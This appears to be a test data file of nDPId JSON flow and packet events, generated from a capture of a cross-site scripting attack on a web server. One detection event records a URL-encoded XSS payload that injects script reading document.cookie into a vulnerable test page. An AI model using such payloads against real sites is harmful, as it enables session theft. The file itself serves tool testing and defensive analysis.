-00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6976,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":493,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347805119,"flow_last_seen":1499347805119,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347805119,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":32878,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6976,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":493,"flow_packet_id":1,"flow_last_seen":1499347805119,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347805119,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8ZmVAAD4GX2usEAABwKgKMoBuAFBq0H\/ZAAAAAKACchDYowAAAgQFtAQCCAoBPBm8AAAAAAEDAwc="} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6977,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":493,"flow_packet_id":2,"flow_last_seen":1499347805119,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347805119,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQgG5Z9D1oatB\/2qAScSBTDwAAAgQFtAQCCAoD5esxATwZvAEDAwc="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6978,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":493,"flow_packet_id":3,"flow_last_seen":1499347805120,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347805120,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0ZmZAAD4GX3KsEAABwKgKMoBuAFBq0H\/aWfQ9aYAQAOXyFgAAAQEICgE8GbwD5esx"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6985,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":494,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347806390,"flow_last_seen":1499347806390,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347806390,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":32892,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6985,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":494,"flow_packet_id":1,"flow_last_seen":1499347806390,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347806390,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8AxtAAD4GwrWsEAABwKgKMoB8AFC+iBnhAAAAAKACchDplwAAAgQFtAQCCAoBPBr6AAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6986,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":494,"flow_packet_id":2,"flow_last_seen":1499347806390,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347806390,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQgHy7zo2dvogZ4qAScSCwtQAAAgQFtAQCCAoD5exvATwa+gEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6988,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":494,"flow_packet_id":3,"flow_last_seen":1499347806391,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347806391,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0AxxAAD4GwrysEAABwKgKMoB8AFC+iBniu86NnoAQAOVPvQAAAQEICgE8GvoD5exv"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6997,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":495,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347807664,"flow_last_seen":1499347807664,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347807664,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":32906,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6997,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":495,"flow_packet_id":1,"flow_last_seen":1499347807664,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347807664,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8PG1AAD4GiWOsEAABwKgKMoCKAFAzSiBUAAAAAKACchBtFgAAAgQFtAQCCAoBPBw5AAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6998,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":495,"flow_packet_id":2,"flow_last_seen":1499347807664,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347807664,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQgIqXGWCRM0ogVaAScSCEtwAAAgQFtAQCCAoD5e2tATwcOQEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6999,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":495,"flow_packet_id":3,"flow_last_seen":1499347807665,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347807665,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0PG5AAD4GiWqsEAABwKgKMoCKAFAzSiBVlxlgkoAQAOUjvwAAAQEICgE8HDkD5e2t"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7015,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":496,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347810243,"flow_last_seen":1499347810243,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347810243,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":32932,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7015,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":496,"flow_packet_id":1,"flow_last_seen":1499347810243,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347810243,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8+YpAAD4GzEWsEAABwKgKMoCkAFCAVuc3AAAAAKACchBWiAAAAgQFtAQCCAoBPB69AAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7016,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":496,"flow_packet_id":2,"flow_last_seen":1499347810243,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347810243,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQgKT1xLjSgFbnOKAScSC0twAAAgQFtAQCCAoD5fAyATwevQEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7017,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":496,"flow_packet_id":3,"flow_last_seen":1499347810244,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347810244,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0+YtAAD4GzEysEAABwKgKMoCkAFCAVuc49cS404AQAOVTvgAAAQEICgE8Hr4D5fAy"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7030,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":497,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347811525,"flow_last_seen":1499347811525,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347811525,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":32946,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7030,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":497,"flow_packet_id":1,"flow_last_seen":1499347811525,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347811525,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8\/z1AAD4GxpKsEAABwKgKMoCyAFD5M+DDAAAAAKACchDizwAAAgQFtAQCCAoBPB\/+AAAAAAEDAwc="} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7031,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":497,"flow_packet_id":2,"flow_last_seen":1499347811525,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347811525,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQgLJEEu3h+TPgxKAScSC8YgAAAgQFtAQCCAoD5fFyATwf\/gEDAwc="} -00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7032,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":497,"flow_packet_id":3,"flow_last_seen":1499347811526,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347811526,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0\/z5AAD4GxpmsEAABwKgKMoCyAFD5M+DERBLt4oAQAOVbagAAAQEICgE8H\/4D5fFy"} -01118{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7033,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":495,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499347807664,"flow_last_seen":1499347811526,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":585,"flow_tot_l4_payload_len":585,"flow_avg_l4_payload_len":146,"midstream":0,"thread_ts_msec":1499347811526,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":32906,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/xss_r\/?name=%3Cscript%3Econsole.log%28%27UQE70NGV80W4ZBVWQELDMRMBY9BF6W552ZBHL3F4W4MIP7R7K6%27%29%3Bconsole.log%28document.cookie%29%3B%3C%2Fscript%3E","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7043,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":498,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347812797,"flow_last_seen":1499347812797,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347812797,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":32960,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7043,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":498,"flow_packet_id":1,"flow_last_seen":1499347812797,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347812797,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8YtxAAD4GYvSsEAABwKgKMoDAAFAQTEPgAAAAAKACchBnTwAAAgQFtAQCCAoBPCE8AAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7044,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":498,"flow_packet_id":2,"flow_last_seen":1499347812797,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347812797,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQgMBbJW45EExD4aAScSCoOQAAAgQFtAQCCAoD5fKwATwhPAEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7045,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":498,"flow_packet_id":3,"flow_last_seen":1499347812798,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347812798,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0Yt1AAD4GYvusEAABwKgKMoDAAFAQTEPhWyVuOoAQAOVHQQAAAQEICgE8ITwD5fKw"} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7049,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":425,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347687089,"flow_last_seen":1499347692807,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347812802,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59852,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7049,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":425,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347687089,"flow_last_seen":1499347692807,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347812802,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59852,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7049,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":426,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347688364,"flow_last_seen":1499347693807,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347812802,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59866,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7049,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":426,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347688364,"flow_last_seen":1499347693807,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347812802,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59866,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7049,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":427,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347689613,"flow_last_seen":1499347694807,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347812802,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59880,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7049,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":427,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347689613,"flow_last_seen":1499347694807,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347812802,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59880,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7049,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":428,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347692128,"flow_last_seen":1499347697807,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347812802,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59906,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7049,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":428,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347692128,"flow_last_seen":1499347697807,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347812802,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59906,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7049,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":429,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347693386,"flow_last_seen":1499347698807,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347812802,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59920,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7049,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":429,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347693386,"flow_last_seen":1499347698807,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347812802,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59920,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7049,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":430,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347694661,"flow_last_seen":1499347699807,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347812802,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59934,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7049,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":430,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347694661,"flow_last_seen":1499347699807,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347812802,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59934,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7052,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":499,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347814066,"flow_last_seen":1499347814066,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347814066,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":32974,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7052,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":499,"flow_packet_id":1,"flow_last_seen":1499347814066,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347814066,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8NuNAAD4Gju2sEAABwKgKMoDOAFApMBSaAAAAAKACchB8ZgAAAgQFtAQCCAoBPCJ5AAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7053,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":499,"flow_packet_id":2,"flow_last_seen":1499347814066,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347814066,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQgM6yTRTHKTAUm6AScSC+XAAAAgQFtAQCCAoD5fPuATwieQEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7055,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":499,"flow_packet_id":3,"flow_last_seen":1499347814067,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347814067,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0NuRAAD4GjvSsEAABwKgKMoDOAFApMBSbsk0UyIAQAOVdZAAAAQEICgE8InkD5fPu"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7061,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":500,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347815351,"flow_last_seen":1499347815351,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347815351,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":32988,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7061,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":500,"flow_packet_id":1,"flow_last_seen":1499347815351,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347815351,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8aqNAAD4GWy2sEAABwKgKMoDcAFBV2UkZAAAAAKACchAZ7wAAAgQFtAQCCAoBPCO6AAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7062,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":500,"flow_packet_id":2,"flow_last_seen":1499347815351,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347815351,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQgNzeXu4gVdlJGqAScSBVOQAAAgQFtAQCCAoD5fUvATwjugEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7063,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":500,"flow_packet_id":3,"flow_last_seen":1499347815352,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347815352,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0aqRAAD4GWzSsEAABwKgKMoDcAFBV2Uka3l7uIYAQAOX0PwAAAQEICgE8I7sD5fUv"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7073,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":501,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347816657,"flow_last_seen":1499347816657,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347816657,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33002,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 